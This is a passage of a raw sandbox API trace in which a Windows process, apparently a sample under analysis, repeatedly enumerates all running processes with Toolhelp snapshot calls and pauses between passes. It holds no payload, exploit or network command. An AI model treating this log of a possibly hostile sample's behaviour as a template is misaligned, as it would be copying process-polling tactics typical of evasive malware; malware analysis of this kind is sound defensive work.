lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.386] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0118.388] CloseHandle (hObject=0xc4) returned 1 [0118.388] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0118.394] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.427] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0118.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.447] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.450] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.451] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0118.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0118.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0118.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0118.476] CloseHandle (hObject=0xbc) returned 1 [0118.476] Sleep (dwMilliseconds=0x12c) [0118.944] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.951] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 